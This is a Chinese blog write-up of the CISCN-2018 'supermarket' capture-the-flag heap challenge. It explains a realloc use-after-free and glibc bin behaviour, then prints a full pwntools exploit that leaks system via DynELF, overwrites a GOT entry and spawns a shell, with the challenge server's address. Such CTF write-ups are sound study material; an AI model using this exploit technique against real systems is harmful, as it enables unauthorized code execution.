CISCN-2018-Quals——supermarket分析

最新推荐文章于 2022-03-21 10:14:36 发布
最新推荐文章于 2022-03-21 10:14:36 发布
阅读量805 收藏
点赞数
分类专栏: pwn题目
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Eagle_hwei/article/details/104485747
版权

supermarket的题目分析

2020-02-01 11:26:17 by hawkJW

题目附件、ida文件及wp链接

   这道题实际上我们大体一看,就可以发现是于堆相关的题目,正好用这道题来学习内存的分配机制。这个分配机制是经过查阅的资料综合一些实验,经过自己的理解得出来的,如果有错误,希望各位师傅谅解!

1. 程序流程总览

首先,按照惯例,我们看一下程序开启的保护措施,如图所示

除了栈上不可以执行以外,其余的保护措施基本没有开启,因此该程序的保护措施还是比较松的。

下面我们来粗略的浏览一下程序的源代码来分析程序流程(ida文件已经经过优化,提高其可读性)

  

实际上,前两个程序并不是很重要,程序流程主要在第三个函数中,我们详细看一下

可以看出来,这是一个比较经典的菜单类题目,我们需要通过程序给出的6个功能 add()、dele()、lis()、changePrice()、changeDes()、exit() 来达到获取shell的目的

 

实际上,我们根据程序的名称以及所给的功能,可以猜到,这应该是添加、修改、删除货物的程序,因此我们需要首先获取货物是如何在程序中进行存储的,即货物的数据结构,我们可以在 add() 函数中分析出来。

通过printf中的各种提示内容,以及上下文,我们可以分析出数据的字段顺序、字段大小以及字段含义,基本如下图所示

因此,实际上,整个程序的数据的结构如下图所示

 2. 漏洞分析

  实际上,该程序的漏洞比较隐蔽,主要是位于 changeDes() 下面这部分代码

注意到这里使用了 realloc 函数,简单介绍一下 realloc 函数

char *realloc(char *ptr, unsigned int newSize) {

    unsigned int curSize;
    char *newPtr;
    if (ptr == 0) {
      return malloc(newSize);
    }

    curSize = Mem_Size(ptr);  //获取ptr所对应的实际区块的大小
    if (newSize <= curSize) {
      return ptr;
    }

    newPtr = malloc(newSize);
    bcopy(ptr, newPtr, (int) curSize);
    free(ptr);
    return(newPtr);
}  
/*  即如果newSize要比ptr对应的实际区块的大小还要大的话,只能先开辟新的空间,将数据转移后,释放掉久的空间
   其他情况的话,仍然返回初始空间
*/

 

也就是说,如果一旦程序代码数据有

size >= (*(&items + v1))->description_size + 2 * SIZE_SZ

实际上上面的 realloc((void *)(*(&items + v1))->description, size) 的函数就可以近似为

realloc((void *)(*(&items + v1))->description, size){
    free((*(&items + v1))->description);
    return malloc(size);
}

但是由于并没有及时的让 (*(&items + v1))->description 更新到新 malloc() 的内存处,因此, (*(&items + v1))->description 仍然指向已经被 free() 掉的内存,自然的我们此时仍然可以向 free() 掉的内存处写入数据(使用程序提供的 changeDes() )。这样子,如果我们再配合计算机的 malloc() 机制,将这个被释放的内存重新分配成一个货物,我们就可以控制该货物的所有参数,从而达到任意地址的读(通过 lis() 函数)、写(通过 changeDes() 函数),从而获取 shell 

 3. 漏洞利用

   知道了上述的程序漏洞后,就可以方便的利用该漏洞来获取 shell ,按照上面的漏洞原理,我们要做的是将free()掉的内存,记为货物A的描述,重新分配给新的货物,记为货物B,从而利用漏洞来达到对任意地址的读、写功能。

  分析程序知道,货物数据的大小为 0x1c ,由于这是32位程序,其分配到的实际块大小为 (0x1c + 0x4) align to 0x8 = 0x20 ,也就是我们需要让该0x20的大小货物B从free()掉的内存来进行分配,就可使用上述的漏洞。

 

  这里需要稍微简单的介绍一下的内存分配机制。实际上,malloc()将堆分为了 fastbin 、 smallbin 、 largebin 以及 unsorted bin 几个类型

  1.  fastbin

   fastbin 的大小从 SIZE_SZ * 4 开始,以步长为 SIZE_SZ * 2 开始,一直到 64 * SIZE_SZ / 4 为止。每一个大小由单向链表进行组织。

  2.  smallbin

  smallbin的大小从SIZE_SZ * 4开始,以步长为SIZE_SZ * 2开始,一直到 63 * SIZE_SZ * 2 为止。每一个大小代表着一个双向循环链表进行组织。

  3.  unsorted bin

  unsorted bin的大小没有什么特殊的要求,但一般的,其大小应该至少大于fastbin的最大值,也就是64 * SIZE_SZ / 4

  4.  largebin

  largebin顾名思义,其是相对于比较大的块,当然,且也进行按照大小进行了分类,但是不同于上面的分类,其每一个类内的大小是处于一个范围而非精确值。其范围宽度为32个64字节、16个512字节、8个4096字节、4个32768字节、2个262144字节,当然还有最后一个分组的范围宽度没有限制。

  上面介绍完了对应的几个块的类型,下面来说具体的机制。

  1. 分配

  我们首先要将申请的大小转换为对应的块的实际大小,即 max(SIZE_SZ * 4, (size + 8) align to (SIZE_SZ * 2)) 如果大小范围在fastbin范围之中,则首先直接到对应大小的单向链表中查询;如果没有的话,再在smallbin之中的对应的大小进行查找;如果还是没有的话,在unsorted bin中查找块的大小满足需求,则直接切割分配即可,如果没有切割剩余,则结束即可;若有切割剩余,将切割剩余的仍然放在unsorted bin中,将unsorted bin中的其余的块按照对应的大小分别放入smallbin或largebin中;如果还是不行,再在largebin中查找对应的块,即首先将所有的fastbin合并移入smallbin或largebin,如果对应的块的切分部分大于SIZE_SZ * 4,则将剩余部分放入unsorted bin;如果还是没有的话,则在top块(特殊块)进行分配;如果top块也无法满足,则使用mmap来进行映射。

  2. 回收

  如果块的大小在fastbin范围之中,将对应的块放入到对应的fastbin之中。如果块的大小不在fastbin的范围之中,则将物理上相邻的释放块进行合并,如果还与TOP块相邻,则合并入到TOP块中,否则放入到unsorted bin之中,如果该合并的块足够大,将会将所有的fastbin合并并再次放入到unsorted bin之中。

  总而言之,简单的回顾了一下内存的分配以及回收机制,现在回到整体上来——即如何让该0x20大小的数据,即货物B,从free()掉的内存,即货物A的描述来进行分配

  因为实际上0x20大小的货物B处于fastbin范围中,那么我们其中一个直观的想法是假如一开始 (*(&items + v1))->description_size 的值为 0x1c ,那么实际上将分配的货物A的描述的大小为0x20,如果此时我们令 realloc((void *)(*(&items + v1))->description, size) 中size大小大于0x20,则成功将其释放,如果我们在重新使用add()来申请货物B话,那么就可以申请到该被释放的空间,则完成漏洞的利用。但是实际上是有问题的,如果我们想修改货物B的参数,则需要使用changeDes()来修改货物A的描述,将realloc((void *)(*(&items + v1))->description, size)中size大小仍然设置为0x1c,就可以修改货物A的描述,也即货物B的参数,然而修改参数的函数稍微有些限制,如图所示

实际上其仅仅能最多读取 length - 1 字节的输入,也就是我们仅仅能修改货物B的参数最多前0x1b字节,而实际上我们真正想修改的是货物B的描述信息的地址,而其位置恰处于第0x19-0x1c字节。由于该限制,我们就无法实现任意地址的读、写。因此,我们需要换一个思路,既能满足上述的漏洞利用条件——货物B从free()的货物A的描述中来分配,同时可以完全修改货物B的所有参数。实际上,根据上面讲到的,我们还有另外一种思路,我们实际上,我们可以通过切割,即让货物A的描述释放后位于unsorted bin之中,而货物B的分配是通过分割货物A的描述,这样子,我们就不会出现上面的问题了,于是就可以利用该漏洞。

下面,我们大概描述一下漏洞利用中的结构变换,首先申请3个货物

add('1', 10, 8, 'a')
add('2', 10, 0x98, 'a')
add('3', 10, 4, 'a')

记住,第二个就相当于我们之前提到的货物A,则其结构如图所示,

下面我们按照之前说的进行漏洞利用,从而构造一个货物B,其名称为‘4’

changeDes('2', 0x100, 'a')
add('4', 10, 4, 'a')

则其结构变为

下面的步骤就很简单了,主要就是通过 DynELF 来获取 system 函数的位置,从而完成漏洞利用

这里就不详细说了,直接放出完整的wp

#coding:utf-8
from pwn import *

# context.log_level = 'debug'
debug = 1 

if debug == 1:
    r = process('./supermarket')
    # gdb.attach(r)
else:
    r = remote('111.198.29.45', 56608)


def add(name, price, descrip_size, description):
    r.recvuntil('your choice>> ')
    r.send('1\n')

    r.recvuntil('name:')
    r.send(name + '\n')

    r.recvuntil('price:')
    r.send(str(price) + '\n')

    r.recvuntil('descrip_size:')
    r.send(str(descrip_size) + '\n')

    r.recvuntil('description:')
    r.send(str(description) + '\n')
    

def dele(name):
    r.recvuntil('your choice>> ')
    r.send('2\n')

    r.recvuntil('name:')
    r.send(name + '\n')

def lis():
    r.recvuntil('your choice>> ')
    r.send('3\n')
    r.recvuntil('all  commodities info list below:\n')
    return r.recvuntil('\n---------menu---------')[:-len('\n---------menu---------')]

def changePrice(name, price):
    r.recvuntil('your choice>> ')
    r.send('4\n')

    r.recvuntil('name:')
    r.send(name + '\n')

    r.recvuntil('input the value you want to cut or rise in:')
    r.send(str(price) + '\n')

def changeDes(name, descrip_size, description):
    r.recvuntil('your choice>> ')
    r.send('5\n')
    
    r.recvuntil('name:')
    r.send(name + '\n')

    r.recvuntil('descrip_size:')
    r.send(str(descrip_size) + '\n')

    r.recvuntil('description:')
    r.send(description + '\n')

def exit():
    r.recvuntil('your choice>> ')
    r.send('6\n')


add('1', 10, 8, 'a')
add('2', 10, 0x98, 'a')
add('3', 10, 4, 'a')
changeDes('2', 0x100, 'a')
add('4', 10, 4, 'a')

def leak_one(address):
    changeDes('2', 0x98, '4' + '\x00' * 0xf + p32(2) + p32(0x8) + p32(address))
    res = lis().split('des.')[-1]
    if(res == '\n'):
        return '\x00'
    return res[0]

def leak(address):
    content =  leak_one(address) + leak_one(address + 1) + leak_one(address + 2) + leak_one(address + 3)
    log.info('%#x => %#x'%(address, u32(content)))
    return content

d = DynELF(leak, elf = ELF('./supermarket'))
system_addr = d.lookup('system', 'libc') 
log.info('system \'s address = %#x'%(system_addr))
bin_addr = 0x0804B0B8
changeDes('1', 0x8, '/bin/sh\x00')
changeDes('2', 0x98, '4' + '\x00' * 0xf + p32(2) + p32(0x8) + p32(0x0804B018))
changeDes('4', 8, p32(system_addr))
dele('1')

r.interactive()

总结

  这道题主要考察了两个方面,一个是漏洞的查找——因为我对于 realloc() 不是很熟悉,所以找到这个漏洞点确实废了不少时间;另一个就是对于内存分配机制的理解,虽然我查了不少资料,但是总感觉还是查了一点意思。所以上面我写的内存的分配与回收步骤是按照我查阅的资料以及自己的一些理解和实验上写出来的,如果有错误,还望各位师傅理解!

HawkJW
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
攻防世界-PWN进阶区-echo_back(CISCN-2018-Quals)
weixin_44145820的博客
03-03 800
本题考查的是对格式化字符串漏洞的利用以及修改_IO_2_1_stdin来实现任意写 题目分析 checksec: 发现保护全开 源码分析: echo函数: 在该函数中有明显的格式化字符串漏洞,但是格式化字符串的长度有限制,最长只能为7,这使得许多利用格式化字符串进行任意内存写的方式不能使用,不过泄露信息还是能够做到的 对于信息泄露,首先我们需要获取libc的基地址,这样我们才能计算system...
cbctf-2018-quals-scrap-square
04-27
cbctf-废料广场创建./config.js和./flag $ docker build -t scrap-square .$ docker run -p 3000:3000 --cap-add=SYS_ADMIN --rm --name scrap-square scrap-square
supermarket CISCN-2018-Quals
qq_41071646的博客
07-25 690
这个题没有想到有一点 。。。。 参考链接 https://blog.csdn.net/qq_33528164/article/details/80144580 这个题目的漏洞点就是 在 realloc 如果 当重新分配的new_size < pre_size, 返回原指针 否则 重新分配 这个就很真实了 而且他这个 还没有改变用户态指针 如果我们操作一波就可以 用另一个...
CISCN-2018-Quals_MS
M3ng@L的博客
03-07 397
CISCN-2018-Quals_Crypto_MSDescriptionDescriptionDescriptionAnalysisAnalysisAnalysisSolving codeSolving~codeSolving codeReferenceReferenceReference keywords:keywords:keywords: 有限域GF(2)下的矩阵乘法 DescriptionDescriptionDescription from Crypto.Util.numbe
CISCN-2018-Quals-SM1
MangoFengC++
03-21 4062
题目 from Crypto.Util.number import getPrime,long_to_bytes,bytes_to_long from Crypto.Cipher import AES import hashlib from random import randint def gen512num(): order=[] while len(order)!=512: tmp=randint(1,512) if tmp not in order:
CISCN-2018-Quals note-service2
qq_41071646的博客
07-23 964
这几天看 wiki 有点头疼 刷会 攻防世界 (那个echo_back 真的头疼 那个 文件结构 不知道是怎么搞出来的) 哪一行代码也不是很清楚是怎么做的 于是就直接跳过那个题目了 note-service2 这个题用ida 分析的时候 看见 show 不能用 笑容 逐渐 凝固 看见edit 不能用的时候 直接关闭了ida 然后发现保护如下 shellcode 一把梭鸭 ...
csawctf-quals-2015-pcapin
05-08
【标题】:“csawctf-quals-2015-pcapin”是一个关于网络安全竞赛的挑战,涉及到了网络数据包捕获与分析的主题。在网络安全领域,尤其是网络安全竞赛(如CSAW CTF)中,参与者经常需要处理PCAP(Packet Capture)...
inno_ctf_2018_quals
05-16
InnoCTF 2018资格赛,任务和解决方案 所需的任务文件 按类别 网页 加密货币 竞价排名 TCP反向 重要时间 佩罗维奇克 :cross_mark: 你现在德威吗? 法证 现在接吻 :cross_mark: 点击它! 生日 间谍无处不在 :...
iset2019quals:任务库和斯维尔德洛夫斯克州“ IsetCTF”地区学校之间首次信息安全公开竞赛资格阶段的分析
05-04
iset2019quals 任务库和斯维尔德洛夫斯克州“ IsetCTF”地区学校之间首次信息安全公开竞赛资格阶段的分析
Seccon-CTF-2016-cheer_msg
02-24
样本来自2016年的Seccon ctf的一道pwn题,该题目使用了alloca内存分配函数,该函数不同于一般堆上的内存分配,而是在栈上进行。题解:https://blog.csdn.net/A951860555/article/details/114011564
CISCN 2018 PWN task_supermarket
Bill
04-29 1623
全国大学生信息安全竞赛-PWN 序言 第一次在大赛中做出PWN题, 心情有点小激动. 程序运行 0. 结构体 struct node{ char name[16]; int price; int size; char* des; }commodity[15]; 1.MENU 1. add a commodity 2. del a...
CISCN2018-WP
04-30 671
MISC: 验证码: 用token登录 输入好验证码就可以得到flag Picture: 图片隐写,一下就想到binwalk或者winhex打开试试 binwalk打开无果 将这段数据ctrl+shift+c复制出来 用下面python脚本生成zip文件。 import zlib import binascii import base64 id=”...
2018 CISCN reverse
weixin_30735745的博客
05-10 110
2018 CISCN reverse 这题比赛的时候没做出来,主要是心态崩了看不下去。。赛后看了下网上的wp发现不难,是自己想复杂了。这里将我的思路和exp放出来,希望大家一起交流学习。 main函数 它首先是check了输入的前六个字符是否与“CISCN{”匹配,接着使用strtok函数将字符串以“_”分割为三部分,然后分别对这三部分check。 sub_4012DE函数 关键部分如下 将...
CISCN-2018-Quals 2ex 攻防世界
qq_41071646的博客
06-07 1656
这个题目 感觉 挺。。。。 又是 MIPS框架的东西 本来一直想配置一下ida 那个插件但是 感觉很麻烦 我就没有配置 然后还是用的 jeb 然后 。。。。 跟着跟着就跟丢了 2333 主要对东西不了解 但是 好好看一下 还是 能跟的 一开始没有看到这个细节 跟到后面发现了这个可疑字符串 去jeb 反编译一下 看看 这nm的不就是base64 看...
2018 CISCN Writeup
weixin_30883777的博客
05-03 492
10.0.0.55 Writeup Web 0x01 easyweb 解题思路 题目很脑洞 用户名admin 密码123456进去可得到flag(密码现在换了) 解题脚本 无 Reverse 0x02 2ex 解题思路 题目给了一个ELF和一个out文件, out文件 运行ELF文件, 发现它会根据我的输入给出对应输出, 格式与out文件中的内容相仿 尝试直接爆破, 得到 flag{change...
919A. Supermarket
码农的一亩三分地
02-13 368
We often go to supermarkets to buy some fruits or vegetables, and on the tag there prints the price for a kilo. But in some supermarkets, when asked how much the items are, the clerk will say that a y...
ciscn 2018 部分writeup
StriveBen的博客
05-07 3921
ciscn 2018 部分writeup flag in your hand 这是一道js解密的题目: 发现checkToken函数数里返回的s===”FAKE-TOKEN”,使用这个字符串却得到wrong,而且ic后面被更改了: 跟踪bm函数: 这里charCodeAt() 方法可返回指定位置的字符的 Unicode 编码; 在ck函数里,ic的值又被更改了,所以要想...
2018年全国大学生信息安全竞赛 CISCN Writeup
热门推荐
aptx4869_li的博客
06-07 1万+
逆向:RE:题目文件:链接:点击打开链接 密码:hyzy这题当时做的时候陷入了出题人的陷阱,上来找到了“关键部分”就开始逆,但是遇到了很多问题,因为有很多函数,而且篇幅都不小,而且每个函数还要调用其他一大堆函数,这就大大增加了工作量,后面实在看不下去了,就放弃了。后面找到一些大佬的writeup看了看,原来是思路的问题:总结一下:逆向赛题一般工作量不会大到让你逆不了,一下锁定了十七八个函数肯定是有...
攻防世界pwn supermarket + 实时数据监测
PLpa的博客
02-13 917
supermarket 这是一个典型的堆题,菜单类型。 只开了NX保护的32位程序。 我们来分析一下程序 程序实现了增删改查,其中改可以改价格和商品的描述,我们重点看改描述,因为程序的漏洞就在这里。 首先让我们输入商品的名字,通过名字来找到商品,这里我们就可以伪造商品了。继续往下看会看到程序让我们输入描述信息的size。通过程序分析我们知道(&s2)[v1]+5是结构体中存储堆的si...
[wp] 攻防世界 CISCN-2018-Final blgdel
MercyLin的博客
10-04 1867
访问robots.txt,发现config.txt <?php class master { private $path; private $name; function __construct() { } function stream_open($path) { if(!preg_match('/(.*)\/(.*)$/s',$path,$array,0...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值